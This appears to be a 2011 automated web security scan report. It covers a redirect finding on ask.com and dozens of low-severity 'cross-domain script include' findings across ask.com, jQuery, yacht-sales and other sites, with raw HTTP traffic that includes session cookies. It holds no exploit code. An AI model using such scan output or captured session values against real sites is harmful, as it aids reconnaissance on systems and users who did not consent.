http://wzus1.ask.com/r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=gg&io=0&ep=&eo=&b=spl&bc=&br=&tp=top&ec=5&pt=Atlantic%20Marine&ex=sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye&url=&u=http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com

The response contains the following link to another domain:

http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com

Request

GET /r?t=p&d=us&s=a&c=a&l=dir&o=0&ld=5490&sv=0a5c4072&ip=adc1d6f3&id=288C5F73AF09BD83114CE98E849718FF&q=regulator+boat+north+carolina&p=1&qs=2990&ac=823&g=7895S7caNNOlJY&en=gg&io=0&ep=&eo=&b=spl&bc=&br=&tp=top&ec=5&pt=Atlantic%20Marine&ex=sgcl%3D9c05%2525t-B22%26sgch%3D8c0cnq5ye&url=&u=http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com HTTP/1.1
Host: wzus1.ask.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; wz_scnt=1; __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; ldpt=porg=5488|0~5489|0~5490|1; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=014DDB4118C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; cu.wz=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir

Response

HTTP/1.1 302 Found
Date: Thu, 27 Jan 2011 19:15:41 GMT
Location: http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com
Content-Length: 441
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.google.com/aclk?sa=L&ai=Cm47CV8RBTcz9Kou-gweIp7S4D8-vrpsB6_PLjBLH8KqbDhABIPv-gQMoBVCC5-6f_P____8BYMmGgICkJMgBAaoEFk_QyO3vo-O46wyLTQ9JmSzi2yUCEUU&num=1&sig=AGiWqtyhTC0jFG4wfWy9ja8wUS0dXQ_rbg&adurl=http://www.AtlanticMarineSales.com">here</a>
...[SNIP]...

13. Cross-domain script include previous next
There are 40 instances of this issue:

http://govguru.com/north-carolina/boat-registration
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://malsup.com/jquery/cycle/
http://malsup.com/jquery/form/
http://www.ask.com/
http://www.ask.com/about
http://www.ask.com/about/legal/privacy
http://www.ask.com/about/legal/terms
http://www.ask.com/advertise
http://www.ask.com/answers
http://www.ask.com/answers/000/Notification
http://www.ask.com/homepage
http://www.ask.com/jsignin
http://www.ask.com/pictures
http://www.ask.com/pictureslanding
http://www.ask.com/questionoftheday
http://www.ask.com/settings
http://www.ask.com/videos
http://www.ask.com/web
http://www.boats.com/boat-transport/index.jsp
http://www.boatxchange.com/pboats/browse/Make/Regulator/search.html
http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/
http://www.dynamicdrive.com/forums/showthread.php
http://www.reel-time.com/forum/showthread.php
http://www.yachtworld.com/boat-content/2011/01/a-new-bertram-flagship-the-800/
http://www.yachtworld.com/boat-loans/finance/help_boatsbank.jsp
http://www.yachtworld.com/boat-loans/finance/rates.jsp
http://www.yachtworld.com/boat-loans/finance/what_to_expect.jsp
http://www.yachtworld.com/boat-loans/index.jsp
http://www.yachtworld.com/boat-loans/partner_program.jsp
http://www.yachtworld.com/boats/2004/Regulator-32-Fs-1930392/Toms-River/NJ/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Forward-Seating-2292192/Pt.-Pleasant/NJ/United-States
http://www.yachtworld.com/boats/2005/Regulator-32-Fs-1787065/Hilton-Head/SC/United-States
http://www.yachtworld.com/core/listing/pl_boat_detail.jsp
https://www.yachtworld.com/boat-loans/consumer_loan_processing.html
https://www.yachtworld.com/boat-loans/forgot_password.jsp
https://www.yachtworld.com/boat-loans/index.jsp
https://www.yachtworld.com/boat-loans/myLoan.jsp

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

13.1. http://govguru.com/north-carolina/boat-registration previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://govguru.com
Path:	/north-carolina/boat-registration

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /north-carolina/boat-registration HTTP/1.1
Host: govguru.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8b DAV/2 PHP/5.2.6
Vary: Accept-Encoding
Cache-Control: max-age=18000
Content-Type: text/html; charset=utf-8
Date: Thu, 27 Jan 2011 19:41:29 GMT
Keep-Alive: timeout=5, max=80
Expires: Fri, 28 Jan 2011 00:41:29 GMT
Connection: close
Set-Cookie: symfony=kps8asljqi3bg5vs2c2f13hic0; path=/
Set-Cookie: loc-1=%2Fnorth-carolina; path=/
Set-Cookie: siteHost=http://govguru.com; path=/; domain=.govguru.com
X-Powered-By: PHP/5.2.6
Content-Length: 89107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>


   <meta http-equiv="Con
...[SNIP]...
</div>

   <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username="></script>
...[SNIP]...

13.2. http://hire.jobvite.com/CompanyJobs/Careers.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://hire.jobvite.com
Path:	/CompanyJobs/Careers.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.linkedin.com/companyInsider?script&useBorder=no

Request

Response

13.3. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 27 Jan 2011 19:13:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

13.4. http://jqueryui.com/themeroller/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.8.8/jquery-ui.min.js
http://static.jquery.com/ui/themeroller/scripts/app.js

Request

GET /themeroller/ HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

13.5. http://malsup.com/jquery/cycle/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/cycle/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js
http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js
http://malsup.github.com/chili-1.7.pack.js
http://malsup.github.com/jquery.easing.1.1.1.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:23 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 06 Apr 2010 00:35:14 GMT
ETag: "10cdf89-1f7c-483869e727480"
Accept-Ranges: bytes
Content-Length: 8060
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js">></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.all.latest.js"></script>
<script type="text/javascript" src="http://malsup.github.com/jquery.easing.1.1.1.js"></script>
<script type="text/javascript" src="http://github.com/malsup/twitter/raw/master/jquery.twitter.search.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

13.6. http://malsup.com/jquery/form/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/form/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js
http://github.com/malsup/form/raw/master/jquery.form.js?v2.44
http://malsup.github.com/chili-1.7.pack.js

Request

GET /jquery/form/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:42:24 GMT
Server: mod_security2/2.5.7
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 57977

<!DOCTYPE html>
<html lang="en_US" class="ui-widget-content">
<head>
<title>jQuery Form Plugin</title>
<link rel="stylesheet" href="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/themes/black
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jqueryui/1.7.2/jquery-ui.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://github.com/malsup/form/raw/master/jquery.form.js?v2.44"></script>
...[SNIP]...

13.7. http://www.ask.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

Response

13.8. http://www.ask.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /about HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

13.9. http://www.ask.com/about/legal/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/privacy

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /about/legal/privacy HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

13.10. http://www.ask.com/about/legal/terms previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/about/legal/terms

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /about/legal/terms HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

13.11. http://www.ask.com/advertise previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/advertise

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: private
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:53 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjUzLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:53 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Content-Length: 37589

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

13.12. http://www.ask.com/answers previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /answers HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

13.13. http://www.ask.com/answers/000/Notification previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/answers/000/Notification

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /answers/000/Notification HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

13.14. http://www.ask.com/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/homepage

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /homepage?q=&o=0&l=dir&page=1 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

13.15. http://www.ask.com/jsignin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/jsignin

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: no-cache
Content-Type: text/html;charset=UTF-8
Date: Thu, 27 Jan 2011 19:13:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 34908

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">

<html>

<head>

...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

13.16. http://www.ask.com/pictures previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictures

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /pictures?qsrc=167&o=0&l=dir&q=regulator+boat&v=14 HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=252994457.1296155592.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); gc=; tbe=1; qh=1-cmVndWxhdG9yK2JvYXQ.|cmVndWxhdG9yK2JvYXQrbm9ydGgrY2Fyb2xpbmE.; accepting=1; wz_scnt=1; gct=; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjE1OjM2LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; ldpt=porg=5488|0~5489|0~5490|1; qc=0; clc=SW5kdXN0cmllcy9UcmFuc3BvcnRhdGlvbl9hbmRfTG9naXN0aWNzL01hcml0aW1lX1RyYW5zcG9ydA..; gcc=U3BvcnRzL1Nwb3J0aW5nX0dvb2Rz; cu.wz=0; gcht=; wz_sid=014DDB4118C033B329ACD8C41BD460F3; wz_uid=0A4EDD4111C033B329ACD8C41BD460F3; __utma=252994457.741105602.1296155592.1296155592.1296155592.1; __utmc=252994457; __utmb=252994457.3.10.1296155592; user=o=0&l=dir;

Response

13.17. http://www.ask.com/pictureslanding previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/pictureslanding

Issue detail

The response dynamically includes the following scripts from other domains:

http://api.recaptcha.net/js/recaptcha_ajax.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /pictureslanding HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
Cache-Control: private
Date: Thu, 27 Jan 2011 19:13:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cu.wz=0; Domain=.ask.com; Expires=Sat, 26-Jan-2013 19:13:11 GMT; Path=/
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEzOjExLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/
Set-Cookie: ldpt=porg=5488|0~5489|0~5490|0~5396|0~5397|0; Domain=.ask.com; Expires=Fri, 27-Jan-2012 19:13:11 GMT; Path=/
Content-Length: 66176

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>

<tit
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script src="http://api.recaptcha.net/js/recaptcha_ajax.js" type="text/javascript"></script>
...[SNIP]...

13.18. http://www.ask.com/questionoftheday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/questionoftheday

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

GET /questionoftheday HTTP/1.1
Host: www.ask.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cu.wz=0; gcht=; gc=; tbe=1; accepting=1; user=o=0&l=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; puser=pt=VGh1LTI3LUphbi0yMDExLTE5OjEyOjQzLVVUQw%3D%3D&po=0&pp=dir; gct=; qc=0;

Response

13.19. http://www.ask.com/settings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/settings

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

Response

13.20. http://www.ask.com/videos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/videos

Issue detail

The response dynamically includes the following script from another domain:

http://api.recaptcha.net/js/recaptcha_ajax.js

Request

Response

13.21. http://www.ask.com/web previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ask.com
Path:	/web

Issue detail

